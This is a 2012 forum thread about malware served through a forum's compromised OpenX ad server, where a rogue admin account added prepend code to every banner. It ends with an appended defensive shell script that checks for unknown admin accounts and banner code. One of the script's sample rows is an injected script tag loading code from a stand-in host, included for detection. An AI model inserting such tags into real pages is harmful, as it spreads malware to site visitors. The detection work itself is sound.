
VIRUS: Caught One!


#21
Originally posted by Zippy:
    Sorry but may have seen this last weekend (haven't really been paying attention). On a few occasions, while trying to load General, FF 3.6 popped up a message that it needed me to install the Java VM. Obv I didn't.
    On win XP (HE) sp 3.
FF 3.6, XP Pro SP3. Nothing so far.

Edit: Browser crashing accessing General. On FF 11.0 Linux now to be hopefully a bit safer.
Last edited by Cliphead; 4 May 2012, 19:39.


#22
IE8 on XP Pro SP3 nothing here


#23
Originally posted by Diver:
    IE8 on XP Pro SP3 nothing here
Me neither. I heard this one affects only people who've recently visited TS porn sites.


#24
Originally posted by OwlHoot:
    Me neither. I heard this one affects only people who've recently visited TS porn sites.
There you go then!

I'm married and therefore have had all my hopes and aspirations crushed along with any vestige of self respect or independence of will.

And my wife says I mustn't go on them sites.


#25
It's weird: it seems to somehow tie in with what appears to be legitimate analytics code, but it's definitely downloading a Java applet, which when decompiled is doing some really weird stuff to make it hard to follow and which definitely has the capability of downloading a further payload. Now trying to work out why it throws an exception in the debugger...
Last edited by NickFitz; 4 May 2012, 21:22.


#26
Nothing here on FF11, W7, AB+, Avast, ........ yet

Come on Nick - I'd expect the perp's home address and phone number by now.


#27
Originally posted by OwlHoot:
    I heard this one affects only people who've recently visited TS porn sites.
Nah, I've hit a good couple of hundred today without problems. Seen plenty of this: [image]
(And this?) [image]
(And a little bit of this:) [image]
(Mixed in with some of this:) [image]
(And finally some stuff that was truly:) [image]

No problems at all.

Well, apart from my eyesight...


#28
Originally posted by ctdctd:
    Nothing here on FF11, W7, AB+, Avast, ........ yet

    Come on Nick - I'd expect the perp's home address and phone number by now.
Admin's just clearing up the adserver - should all be OK shortly


#29
Originally posted by NickFitz:
    Admin's just clearing up the adserver - should all be OK shortly
You tell him


#30
Thanks for helping locate the problem Nick. Apologies to all of you for not sorting this one any sooner, but as I could not replicate it and could not find any errant code anywhere I was at a complete loss and was not convinced there was a problem, or possibly some sort of code that was being added and removed regularly that was making it hard to spot. Should have thought of trying older versions of browsers and also should have looked in more detail at the banner management software. As usual I have excuses, so here goes...

The previous malware installer was a vBulletin / vBSEO exploit, so when we started getting virus alerts again this was where I checked first. I checked we were patched, checked previous known points of malicious code and found nothing. I could not replicate the problem and as the reports were so infrequent I did not think it was a major issue.

When I started getting more alerts I did look at the banner management system - OpenX. I logged in and checked for updates and I checked their site too. Nothing untoward there either and no warnings of problems.

Following the rise in reports today and Nick replicating the problem using old IE versions, I did the same and saw my copy of IE6 fail at the point where the banner should be rendered and, like Nick, saw the request to a dyndns.org address via the Charles proxy I had installed. Still not sure, I Googled "OpenX dyndns" and found this article:
OpenX CSRF Vulnerability Being Actively Exploited (InfosecStuff)

It looks like OpenX had their servers hacked and, if you were unlucky enough to log into your OpenX install before the hack on their machine was noticed, an admin account was added to your installation which allowed malicious code to be added to the system. Sure enough the extra admin account had been added and the prepend code added to all banners as described in the article.

As I said, I checked the OpenX site and the version checker on the install, as OpenX have previously alerted those on their mailing list to problems like this. So why no alert this time? Well, no fix for the compromise has been found and also the source of the attack was their own server from what I understand of the article, so instead of holding their hands up they have kept quiet about it IMO. The article states the source of the infection was deleted from the OpenX servers on the 24th April, yet the blog post highlighting the problem was only a couple of days ago and they have still not notified their community that this has happened. Assholes. That's the kind of community spirit I love, not fessing up to a problem as it may hurt their credibility.

I am putting some steps in to stop this same problem happening again: basic auth'ing the admin area so even if an admin account is created the attacker won't be able to get in to add the malicious code, hourly checks for admin accounts via a quick shell script, and a check for prepend / append code in the DB as well.

Apologies again to anyone affected by this and while it will be small consolation to some it has given me a better understanding of where to look should something like this happen again.
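The two database checks the admin describes in #30 (an admin account nobody created, and prepend/append code attached to banners), written out as an added example script. This is not the admin's own script and not part of OpenX. It assumes the OpenX 2.8 schema with an `ox_users` table (user_id, username, is_admin) and an `ox_banners` table (bannerid, prepend, append) under the default `ox_` prefix, which you should verify against your install. So that it runs offline, the two `*_rows` functions return constructed sample rows in place of the `mysql` queries they stand in for (the real queries are in the comments); the sample rows, including the hostname in the injected script tag, are made up.

```shell
#!/bin/sh
# openx-check.sh: hourly integrity check for an OpenX install (added example,
# not the forum admin's script and not part of OpenX).
#   1. is there an admin account we did not create?
#   2. does any banner carry prepend / append code?
# Assumed schema: ox_users (user_id, username, is_admin) and
# ox_banners (bannerid, prepend, append) with the default "ox_" prefix.

# Admin usernames you created yourself, one per line. Anything else is flagged.
KNOWN_ADMINS="admin
ckadmin"

admin_rows() {
    # Production: mysql -N -B -e "SELECT user_id, username FROM ox_users WHERE is_admin = 1" openx
    # Constructed sample rows, tab separated: user_id<TAB>username
    printf '1\tadmin\n2\tckadmin\n9\topenxadm\n'
}

banner_rows() {
    # Production: mysql -N -B -e "SELECT bannerid, prepend, append FROM ox_banners" openx
    # Constructed sample rows, tab separated: bannerid<TAB>prepend<TAB>append
    printf '101\t\t\n'
    printf '102\t<script src="http://payload.example/a.js"></script>\t\n'
    printf '103\t\t<!-- tracking -->\n'
}

# Print every admin username not listed in KNOWN_ADMINS; exit 1 if any, 0 if none.
unknown_admins() {
    admin_rows | awk -F'\t' -v known="$KNOWN_ADMINS" '
        BEGIN { n = split(known, k, "\n"); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
        !($2 in ok) { print $2; bad = 1 }
        END { if (bad) exit 1; exit 0 }'
}

# Print every banner whose prepend or append field is non-empty; exit 1 if any.
# Flagging "non-empty" rather than "looks malicious" keeps the check simple and
# leaves nothing for an attacker to obfuscate around; whitelist by bannerid if
# you genuinely use these fields.
banner_code() {
    banner_rows | awk -F'\t' '
        $2 != "" || $3 != "" { printf "banner %s prepend=[%s] append=[%s]\n", $1, $2, $3; bad = 1 }
        END { if (bad) exit 1; exit 0 }'
}

# Run both checks; non-zero exit if either flagged something.
run_checks() {
    status=0
    unknown_admins || status=1
    banner_code || status=1
    return "$status"
}

# Hourly crontab line; cron mails whatever the script prints:
#   0 * * * * /usr/local/bin/openx-check.sh --run
case "${1:-}" in --run) run_checks ;; esac
```

Run against the sample rows it reports `openxadm` as an unknown admin and banners 102 and 103 as carrying code, and exits 1. It detects a repeat of the compromise after the fact; the basic auth in front of the admin area that the post also mentions is what stops a rogue account being used in the first place.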
